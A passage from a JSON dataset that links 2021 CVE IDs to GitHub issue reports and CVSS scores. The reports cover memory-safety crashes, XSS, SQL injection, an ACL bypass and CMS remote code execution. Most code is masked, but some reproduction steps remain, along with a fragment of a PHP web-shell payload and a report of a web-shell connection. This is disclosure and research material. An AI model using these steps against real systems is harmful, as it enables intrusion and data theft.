APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING ~~~~ System Configuration APITAG ~~~~ PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG fopenmp Wall O0 g fsanitize=address mtune=broadwell fexceptions pthread DMAGICKCORE_HDRI_ENABLE NUMBERTAG DMAGICKCORE_QUANTUM_DEPTH NUMBERTAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib fontconfig freetype jng jp2 jpeg lzma png x xml zlib Environment APITAG system, version and so on): APITAG DISTRIB_RELEASE NUMBERTAG DISTRIB_CODENAME=xenial APITAG NUMBERTAG LTS\" Additional information: APITAG Here is the link toward function APITAG URLTAG APITAG APITAG",
  68558. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68559. "severity": "MEDIUM",
  68560. "baseScore": 6.5,
  68561. "impactScore": 3.6,
  68562. "exploitabilityScore": 2.8
  68563. },
  68564. {
  68565. "CVE_ID": "CVE-2021-35970",
  68566. "Issue_Url_old": "https://github.com/coralproject/talk/issues/3600",
  68567. "Issue_Url_new": "https://github.com/coralproject/talk/issues/3600",
  68568. "Repo_new": "coralproject/talk",
  68569. "Issue_Created_At": "2021-06-28T08:37:55Z",
  68570. "description": "Severe Security Issue in Version NUMBERTAG E Mail Leak. I already contacted some maintainers privately about this, but they did not respond. That's why I'm now making this public. In Talk version NUMBERTAG it is very easy to query the e mail addresses of users without any authentication; thus, possibly revealing their true identities behind their pseudonyms. This is possible although the documentation states: > The primary email address of the user. Only accessible to Administrators or the current user. But in order to find out the e mail address of a user, you can e.g. simply send a APITAG APITAG query to the APITAG endpoint of the talk server \u00ad without any authentication. You can also query all e mail addresses with APITAG . I demand the maintainers ( MENTIONTAG , MENTIONTAG APITAG to merge the pull request URLTAG as soon as possible, and release version NUMBERTAG in the version NUMBERTAG branch.",
  68571. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  68572. "severity": "HIGH",
  68573. "baseScore": 7.5,
  68574. "impactScore": 3.6,
  68575. "exploitabilityScore": 3.9
  68576. },
  68577. {
  68578. "CVE_ID": "CVE-2021-3628",
  68579. "Issue_Url_old": "https://github.com/openkm/document-management-system/issues/278",
  68580. "Issue_Url_new": "https://github.com/openkm/document-management-system/issues/278",
  68581. "Repo_new": "openkm/document-management-system",
  68582. "Issue_Created_At": "2021-04-08T07:59:31Z",
  68583. "description": "Cross Site Scrtipting issue.",
  68584. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68585. "severity": "MEDIUM",
  68586. "baseScore": 5.4,
  68587. "impactScore": 2.7,
  68588. "exploitabilityScore": 2.3
  68589. },
  68590. {
  68591. "CVE_ID": "CVE-2021-36383",
  68592. "Issue_Url_old": "https://github.com/vatesfr/xen-orchestra/issues/5712",
  68593. "Issue_Url_new": "https://github.com/vatesfr/xen-orchestra/issues/5712",
  68594. "Repo_new": "vatesfr/xen-orchestra",
  68595. "Issue_Created_At": "2021-04-05T22:34:39Z",
  68596. "description": "XEN Orchestra privilege escalation via websockets. Context XO origin : XO Appliance Versions : Node NUMBERTAG o web NUMBERTAG o server NUMBERTAG Expected behavior Permissions enforcement through websockets is not thoroughly checked and can lead to an unprivileged 'user' to obtain data only accessible by 'admin'. VMs, Backups, Audit, Users, Groups, etc. Current behavior The websockets that control the application API are allowing access to certain elements based purely on the response (which can be manipulated). This would be similar to an ecommerce application taking the price of a shopping cart from the DOM (can be manipulated by the user) and starting the checkout process using this value). In this POC, the method APITAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
  68597. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  68598. "severity": "MEDIUM",
  68599. "baseScore": 4.3,
  68600. "impactScore": 1.4,
  68601. "exploitabilityScore": 2.8
  68602. },
  68603. {
  68604. "CVE_ID": "CVE-2021-36408",
  68605. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/299",
  68606. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/299",
  68607. "Repo_new": "strukturag/libde265",
  68608. "Issue_Created_At": "2021-06-23T03:45:54Z",
  68609. "description": "Heap use after free in intrapred.h when decoding file. Hello, A Heap use after free has occurred when running program dec NUMBERTAG System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG APITAG asan info ERRORTAG",
  68610. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68611. "severity": "MEDIUM",
  68612. "baseScore": 5.5,
  68613. "impactScore": 3.6,
  68614. "exploitabilityScore": 1.8
  68615. },
  68616. {
  68617. "CVE_ID": "CVE-2021-36409",
  68618. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/300",
  68619. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/300",
  68620. "Repo_new": "strukturag/libde265",
  68621. "Issue_Created_At": "2021-06-24T13:41:11Z",
  68622. "description": "There is an Assertion failed at sps.cc. Hello, There is an Assertion APITAG failed at APITAG in libde NUMBERTAG when decoding file. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG APITAG Output ERRORTAG gdb info ERRORTAG",
  68623. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68624. "severity": "HIGH",
  68625. "baseScore": 7.8,
  68626. "impactScore": 5.9,
  68627. "exploitabilityScore": 1.8
  68628. },
  68629. {
  68630. "CVE_ID": "CVE-2021-36410",
  68631. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/301",
  68632. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/301",
  68633. "Repo_new": "strukturag/libde265",
  68634. "Issue_Created_At": "2021-06-24T14:47:49Z",
  68635. "description": "stack buffer overflow in fallback motion.cc when decoding file. Hello, A stack buffer overflow has occurred when running program dec NUMBERTAG System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG APITAG asan info ERRORTAG",
  68636. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68637. "severity": "MEDIUM",
  68638. "baseScore": 5.5,
  68639. "impactScore": 3.6,
  68640. "exploitabilityScore": 1.8
  68641. },
  68642. {
  68643. "CVE_ID": "CVE-2021-36411",
  68644. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/302",
  68645. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/302",
  68646. "Repo_new": "strukturag/libde265",
  68647. "Issue_Created_At": "2021-06-25T14:41:05Z",
  68648. "description": "A SEGV has occurred when running program dec NUMBERTAG Hello, A SEGV of deblock.cc in function APITAG has occurred when running program dec NUMBERTAG source code CODETAG Due to incorrect access control, a SEGV caused by a READ memory access occurred at line NUMBERTAG of the code. This issue can cause a Denial of Service attack. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Dec NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of libde NUMBERTAG APITAG APITAG NUMBERTAG run dec NUMBERTAG without asan) APITAG Output ERRORTAG APITAG output ERRORTAG gdb info ERRORTAG",
  68649. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68650. "severity": "MEDIUM",
  68651. "baseScore": 5.5,
  68652. "impactScore": 3.6,
  68653. "exploitabilityScore": 1.8
  68654. },
  68655. {
  68656. "CVE_ID": "CVE-2021-36412",
  68657. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1838",
  68658. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1838",
  68659. "Repo_new": "gpac/gpac",
  68660. "Issue_Created_At": "2021-07-03T03:57:55Z",
  68661. "description": "A heap buffer overflow in function APITAG Hello, A heap buffer overflow has occurred when running program APITAG can reproduce on the lattest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG asan info ERRORTAG source code of rtp_pck_mpeg NUMBERTAG c CODETAG",
  68662. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68663. "severity": "HIGH",
  68664. "baseScore": 7.8,
  68665. "impactScore": 5.9,
  68666. "exploitabilityScore": 1.8
  68667. },
  68668. {
  68669. "CVE_ID": "CVE-2021-36414",
  68670. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1840",
  68671. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1840",
  68672. "Repo_new": "gpac/gpac",
  68673. "Issue_Created_At": "2021-07-05T12:32:43Z",
  68674. "description": "heap buffer overflow issue with gpac APITAG Hello, A heap buffer overflow has occurred when running program APITAG leads to a Deny of Service caused by dividing zero without sanity check,this can reproduce on the lattest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG file: media.c APITAG line NUMBERTAG As below code shows: CODETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG In Command line: ERRORTAG gdb info FILETAG asan info ERRORTAG",
  68675. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68676. "severity": "HIGH",
  68677. "baseScore": 7.8,
  68678. "impactScore": 5.9,
  68679. "exploitabilityScore": 1.8
  68680. },
  68681. {
  68682. "CVE_ID": "CVE-2021-36417",
  68683. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1846",
  68684. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1846",
  68685. "Repo_new": "gpac/gpac",
  68686. "Issue_Created_At": "2021-07-07T03:09:17Z",
  68687. "description": "A heap buffer overflow has occurred in function gf_isom_dovi_config_get. Hello, A heap buffer overflow has occurred in function gf_isom_dovi_config_get of APITAG when running program APITAG can reproduce on the lattest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG command line ERRORTAG asan info ERRORTAG source code CODETAG",
  68688. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68689. "severity": "HIGH",
  68690. "baseScore": 7.8,
  68691. "impactScore": 5.9,
  68692. "exploitabilityScore": 1.8
  68693. },
  68694. {
  68695. "CVE_ID": "CVE-2021-36440",
  68696. "Issue_Url_old": "https://github.com/star7th/showdoc/issues/1406",
  68697. "Issue_Url_new": "https://github.com/star7th/showdoc/issues/1406",
  68698. "Repo_new": "star7th/showdoc",
  68699. "Issue_Created_At": "2021-06-24T06:45:37Z",
  68700. "description": "File Upload vulnerability. A File Upload vulnerability was discovered in APITAG NUMBERTAG description The file_url parameter allows remote download of compressed files, and the files in the compressed package will be released to the web directory when decompressed Vulnerability file: PATHTAG ERRORTAG APITAG CODETAG zip File FILETAG",
  68701. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68702. "severity": "CRITICAL",
  68703. "baseScore": 9.8,
  68704. "impactScore": 5.9,
  68705. "exploitabilityScore": 3.9
  68706. },
  68707. {
  68708. "CVE_ID": "CVE-2021-36454",
  68709. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/24",
  68710. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/24",
  68711. "Repo_new": "navigatecms/navigate-cms",
  68712. "Issue_Created_At": "2021-06-22T08:59:25Z",
  68713. "description": "Reflected XSS attack with navigate quickse parameter and affect many modules in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability with navigate quickse parameter in URL and affect many modules. IMPACT Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. VULNERABILITY CODE I found the vulnerability code in many files. Because initial_url is built in these files. > PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG FILETAG After that initial_url is used in PATHTAG file to build HTML. FILETAG STEPS TO REPRODUCE NUMBERTAG We change the request and send the link to user CODETAG FILETAG NUMBERTAG People who already login and click to the link above NUMBERTAG When loading the page then the Reflected XSS is executed. FILETAG",
  68714. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68715. "severity": "MEDIUM",
  68716. "baseScore": 5.4,
  68717. "impactScore": 2.7,
  68718. "exploitabilityScore": 2.3
  68719. },
  68720. {
  68721. "CVE_ID": "CVE-2021-36455",
  68722. "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/25",
  68723. "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/25",
  68724. "Repo_new": "navigatecms/navigate-cms",
  68725. "Issue_Created_At": "2021-06-26T09:25:58Z",
  68726. "description": "SQL injection UNION attack with quicksearch parameter in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a SQL injection UNION attack vulnerability with quicksearch parameter in URL. IMPACT A successful SQL injection attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business. VULNERABILITY CODE I found quicksearch parameter is not handled in SQL query with WHERE clause in PATHTAG FILETAG And the protect function in PATHTAG is not use ESCAPE to filter special characters FILETAG Then it is use to query in: PATHTAG FILETAG STEPS TO REPRODUCE NUMBERTAG We change the request in URL ERRORTAG NUMBERTAG And then we could exploit all the data. FILETAG",
  68727. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  68728. "severity": "HIGH",
  68729. "baseScore": 8.8,
  68730. "impactScore": 5.9,
  68731. "exploitabilityScore": 2.8
  68732. },
  68733. {
  68734. "CVE_ID": "CVE-2021-36461",
  68735. "Issue_Url_old": "https://github.com/microweber/microweber/issues/751",
  68736. "Issue_Url_new": "https://github.com/microweber/microweber/issues/751",
  68737. "Repo_new": "microweber/microweber",
  68738. "Issue_Created_At": "2021-06-26T02:24:23Z",
  68739. "description": "microweber NUMBERTAG has background upload getshell. FILETAG This pdf file describes the vulnerability in detail",
  68740. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  68741. "severity": "HIGH",
  68742. "baseScore": 8.8,
  68743. "impactScore": 5.9,
  68744. "exploitabilityScore": 2.8
  68745. },
  68746. {
  68747. "CVE_ID": "CVE-2021-36513",
  68748. "Issue_Url_old": "https://github.com/signalwire/freeswitch/issues/1245",
  68749. "Issue_Url_new": "https://github.com/signalwire/freeswitch/issues/1245",
  68750. "Repo_new": "signalwire/freeswitch",
  68751. "Issue_Created_At": "2021-06-29T23:15:58Z",
  68752. "description": "Usage of uninitialized value . There are a few uninitialized value use bugs in PATHTAG In function APITAG Array network_ip will be allocated in line NUMBERTAG CODETAG Then, it will be initialized by APITAG NUMBERTAG sofia_glue_get_addr(de >data >e_msg, network_ip, sizeof(network_ip), NULL NUMBERTAG for NUMBERTAG profile >acl_count NUMBERTAG last_acl = profile >acl NUMBERTAG if (!(acl_ok = APITAG last_acl NUMBERTAG break; However, APITAG may return earlier, leading network_ip in an uninitliazed state. Then network_ip will be used in APITAG It may bypass (ACL) security checks due to the uninitialized value of network_ip, leading to privilege escalation. Same in: CODETAG and in function APITAG CODETAG and in function APITAG CODETAG APITAG may return earlier, leading network_ip in an uninitialized state. Then network_ip will be used in function APITAG This function may print out sensitive data network_ip contained from previous stack. Fix: set network_ip NUMBERTAG preventing from uninitlized value use. Thank you for the review, I also report this bug to CVE.",
  68753. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  68754. "severity": "HIGH",
  68755. "baseScore": 7.5,
  68756. "impactScore": 3.6,
  68757. "exploitabilityScore": 3.9
  68758. },
  68759. {
  68760. "CVE_ID": "CVE-2021-3652",
  68761. "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/4817",
  68762. "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/4817",
  68763. "Repo_new": "389ds/389-ds-base",
  68764. "Issue_Created_At": "2021-06-29T12:56:33Z",
  68765. "description": "CRYPT password hash with asterisk. Issue Description If an entry contains an asterisk as the crypted password hash, binding is possible with any password for this entry APITAG {CRYPT} Package Version and Platform: Platform: APITAG Leap NUMBERTAG Package and version NUMBERTAG ds NUMBERTAG APITAG APITAG Browser firefox Steps to Reproduce Steps to reproduce the behavior NUMBERTAG Create an entry (e.g. a APITAG with the APITAG set to \"{CRYPT} \", e.g. by importing it from an ldif file NUMBERTAG Try to bind with that entry using an arbitrary password (e.g. \"llhh NUMBERTAG Check if the binding was successfull Expected results I would expect to fail the binding with any password because the asterisk is not a vaild character in a crypted password. Screenshots If applicable, add screenshots to help explain your problem. Additional context Problem occured after importing entries from a NIS database. In NIS (and in /etc/shadow), the asterisk is often used for special users like \"nobody\".",
  68766. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  68767. "severity": "MEDIUM",
  68768. "baseScore": 6.5,
  68769. "impactScore": 2.5,
  68770. "exploitabilityScore": 3.9
  68771. },
  68772. {
  68773. "CVE_ID": "CVE-2021-36530",
  68774. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/19",
  68775. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/19",
  68776. "Repo_new": "miniupnp/ngiflib",
  68777. "Issue_Created_At": "2021-06-30T02:36:51Z",
  68778. "description": "APITAG heap buffer overflow in APITAG at APITAG in NGIFLIB_NO_FILE mode. Similar to NUMBERTAG this Overflow problem is because in NGIFLIB_NO_FILE mode, APITAG copy memory buffer without checking the boundary. Test Environment Ubuntu NUMBERTAG bit ngiflib(master NUMBERTAG fd4) How to trigger NUMBERTAG Compile the program with APITAG in NGIFLIB_NO_FILE mode APITAG NUMBERTAG run the compiled program APITAG POC file URLTAG Details ASAN report ERRORTAG",
  68779. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68780. "severity": "HIGH",
  68781. "baseScore": 8.8,
  68782. "impactScore": 5.9,
  68783. "exploitabilityScore": 2.8
  68784. },
  68785. {
  68786. "CVE_ID": "CVE-2021-36531",
  68787. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/18",
  68788. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/18",
  68789. "Repo_new": "miniupnp/ngiflib",
  68790. "Issue_Created_At": "2021-06-30T02:34:21Z",
  68791. "description": "APITAG heap buffer overflow in APITAG at APITAG in NGIFLIB_NO_FILE mode. This Overflow problem is because in NGIFLIB_NO_FILE mode, APITAG reads memory buffer without checking the boundary. Test Environment Ubuntu NUMBERTAG bit ngiflib(master NUMBERTAG fd4) How to trigger NUMBERTAG Compile the program with APITAG in NGIFLIB_NO_FILE mode APITAG NUMBERTAG run the compiled program APITAG POC file URLTAG Details ASAN report ERRORTAG",
  68792. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68793. "severity": "HIGH",
  68794. "baseScore": 8.8,
  68795. "impactScore": 5.9,
  68796. "exploitabilityScore": 2.8
  68797. },
  68798. {
  68799. "CVE_ID": "CVE-2021-36547",
  68800. "Issue_Url_old": "https://github.com/r0ck3t1973/RCE/issues/1",
  68801. "Issue_Url_new": "https://github.com/r0ck3t1973/rce/issues/1",
  68802. "Repo_new": "r0ck3t1973/rce",
  68803. "Issue_Created_At": "2020-09-01T08:04:38Z",
  68804. "description": "Remote Code Execution via Snippets module in Mara version NUMBERTAG Describe the bug / An attacker could insert any executable code through php via File to execution command in the server / To Reproduce NUMBERTAG Log into the panel NUMBERTAG Click APITAG >> New ( PATHTAG NUMBERTAG Click File Upload NUMBERTAG Insert payload php: FILETAG NUMBERTAG Save and Exit NUMBERTAG Go to PATHTAG / Screenhost NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG",
  68805. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68806. "severity": "CRITICAL",
  68807. "baseScore": 9.8,
  68808. "impactScore": 5.9,
  68809. "exploitabilityScore": 3.9
  68810. },
  68811. {
  68812. "CVE_ID": "CVE-2021-36548",
  68813. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/470",
  68814. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/470",
  68815. "Repo_new": "monstra-cms/monstra",
  68816. "Issue_Created_At": "2021-07-05T02:51:41Z",
  68817. "description": "RCE APITAG Code Execution via Theme Blog Monstra version NUMBERTAG Describe the bug An attacker could insert any executable code through php via Theme Blog to execution command in the server To Reproduce NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click edit Blog NUMBERTAG Insert payload FILETAG APITAG APITAG <form method=\"GET\" name=\"<?php echo basename($_SERVER FILETAG FILETAG",
  68818. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68819. "severity": "CRITICAL",
  68820. "baseScore": 9.8,
  68821. "impactScore": 5.9,
  68822. "exploitabilityScore": 3.9
  68823. },
  68824. {
  68825. "CVE_ID": "CVE-2021-36550",
  68826. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/6",
  68827. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/6",
  68828. "Repo_new": "r0ck3t1973/xss_payload",
  68829. "Issue_Created_At": "2021-07-07T12:52:26Z",
  68830. "description": "Bypass Cross Site Script Vulnerability on APITAG in APITAG version NUMBERTAG Hi, I found stored xss in Categories. To Reproduce NUMBERTAG Login into the panel NUMBERTAG Go to Documents: 'tiki NUMBERTAG tiki APITAG NUMBERTAG Click Categories: PATHTAG NUMBERTAG Create category NUMBERTAG insert payload bypass xss: APITAG APITAG APITAG NUMBERTAG Click Categories >> Click2 >> Boom alert message xss! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. POC FILETAG FILETAG FILETAG",
  68831. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68832. "severity": "MEDIUM",
  68833. "baseScore": 5.4,
  68834. "impactScore": 2.7,
  68835. "exploitabilityScore": 2.3
  68836. },
  68837. {
  68838. "CVE_ID": "CVE-2021-36551",
  68839. "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/7",
  68840. "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/7",
  68841. "Repo_new": "r0ck3t1973/xss_payload",
  68842. "Issue_Created_At": "2021-07-07T12:53:38Z",
  68843. "description": "Bypass Cross Site Script Vulnerability on APITAG in APITAG version NUMBERTAG Hi Team, I found stored xss in Calendar To Reproduce NUMBERTAG Login into panel NUMBERTAG Go to Documents: PATHTAG NUMBERTAG Click Calendar: PATHTAG NUMBERTAG Click Add Event NUMBERTAG insert payload bypass xss in Description APITAG NUMBERTAG Click Details Event >> APITAG Boom alert message xss! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. POC FILETAG FILETAG FILETAG",
  68844. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68845. "severity": "MEDIUM",
  68846. "baseScore": 5.4,
  68847. "impactScore": 2.7,
  68848. "exploitabilityScore": 2.3
  68849. },
  68850. {
  68851. "CVE_ID": "CVE-2021-36564",
  68852. "Issue_Url_old": "https://github.com/top-think/framework/issues/2559",
  68853. "Issue_Url_new": "https://github.com/top-think/framework/issues/2559",
  68854. "Repo_new": "top-think/framework",
  68855. "Issue_Created_At": "2021-07-02T13:21:46Z",
  68856. "description": "APITAG exists unserialize vulnerability . thinkphp NUMBERTAG has a unserialize vulnerability Vulnerability Demo Create Routing at APITAG ERRORTAG this is my poc ERRORTAG The file has been generated in the directory in public Vulnerability Analysis First one starts with __destruct, autosave can be bypassed by assigning a value of true FILETAG finally at APITAG FILETAG And this one happens to have the file_put_contents method in it FILETAG The parameters are all controllable, but we need to bypass the APITAG method, otherwise if we pass in escape symbols it will also output APITAG Here I pass in APITAG will be commented out in front and followed by APITAG is separated, causing the vulnerability, analysis is complete",
  68857. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68858. "severity": "CRITICAL",
  68859. "baseScore": 9.8,
  68860. "impactScore": 5.9,
  68861. "exploitabilityScore": 3.9
  68862. },
  68863. {
  68864. "CVE_ID": "CVE-2021-36567",
  68865. "Issue_Url_old": "https://github.com/top-think/framework/issues/2561",
  68866. "Issue_Url_new": "https://github.com/top-think/framework/issues/2561",
  68867. "Repo_new": "top-think/framework",
  68868. "Issue_Created_At": "2021-07-02T13:42:08Z",
  68869. "description": "PHP unserialize vulnerability in NUMBERTAG PHP unserialize vulnerability in NUMBERTAG ulnerability Demo This chain does not show back on the web page, but can execute system commands, and the public chain is a little different from the Internet First, simply write a route ERRORTAG exp ERRORTAG Attempt to write file successful FILETAG Ant sword connection successful FILETAG",
  68870. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68871. "severity": "CRITICAL",
  68872. "baseScore": 9.8,
  68873. "impactScore": 5.9,
  68874. "exploitabilityScore": 3.9
  68875. },
  68876. {
  68877. "CVE_ID": "CVE-2021-36584",
  68878. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1842",
  68879. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1842",
  68880. "Repo_new": "gpac/gpac",
  68881. "Issue_Created_At": "2021-07-06T02:59:40Z",
  68882. "description": "heap buffer overflow in gp_rtp_builder_do_t NUMBERTAG g. Hello, A heap buffer overflow has occurred when running program APITAG can reproduce on the lattest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG asan info ERRORTAG source code ERRORTAG",
  68883. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68884. "severity": "MEDIUM",
  68885. "baseScore": 5.5,
  68886. "impactScore": 3.6,
  68887. "exploitabilityScore": 1.8
  68888. },
  68889. {
  68890. "CVE_ID": "CVE-2021-3660",
  68891. "Issue_Url_old": "https://github.com/cockpit-project/cockpit/issues/16122",
  68892. "Issue_Url_new": "https://github.com/cockpit-project/cockpit/issues/16122",
  68893. "Repo_new": "cockpit-project/cockpit",
  68894. "Issue_Created_At": "2021-07-20T13:49:33Z",
  68895. "description": "Is cockpit vulnerable to clickjacking?. Through a security scan, I was notified: > APITAG remote web server does not set an X Frame Options response header or a Content Security Policy 'frame ancestors' response header in all content responses. This could potentially expose the site to a clickjacking or UI redress attack, in which an attacker can trick a user into clicking an area of the vulnerable page that is different than what the user perceives the page to be. This can result in a user performing fraudulent or malicious transactions._ Suggested solution is: > Return the X Frame Options or Content Security Policy (with the 'frame ancestors' directive) HTTP header with the page's response. Is there a way to do this through the config in cockpit? or is there some other reason it is not subject to clickjacking? Thank you",
  68896. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  68897. "severity": "MEDIUM",
  68898. "baseScore": 4.3,
  68899. "impactScore": 1.4,
  68900. "exploitabilityScore": 2.8
  68901. },
  68902. {
  68903. "CVE_ID": "CVE-2021-36605",
  68904. "Issue_Url_old": "https://github.com/3xxx/engineercms/issues/52",
  68905. "Issue_Url_new": "https://github.com/3xxx/engineercms/issues/52",
  68906. "Repo_new": "3xxx/engineercms",
  68907. "Issue_Created_At": "2021-07-06T14:16:22Z",
  68908. "description": "APITAG has a stored XSS vulnerability. Description There is no escaping in the nickname field on the user list APITAG viewing this page, the APITAG code will be executed in the user's browser. Impact Version NUMBERTAG Steps to Reproduce APITAG the profile page after logging in\uff0c APITAG APITAG on the nickname and insert the javascript code\uff0c ERRORTAG APITAG save, the payload has been executed FILETAG The original request is as follows\uff1a ERRORTAG",
  68909. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  68910. "severity": "MEDIUM",
  68911. "baseScore": 5.4,
  68912. "impactScore": 2.7,
  68913. "exploitabilityScore": 2.3
  68914. },
  68915. {
  68916. "CVE_ID": "CVE-2021-3664",
  68917. "Issue_Url_old": "https://github.com/unshiftio/url-parse/issues/205",
  68918. "Issue_Url_new": "https://github.com/unshiftio/url-parse/issues/205",
  68919. "Repo_new": "unshiftio/url-parse",
  68920. "Issue_Created_At": "2021-05-25T16:12:20Z",
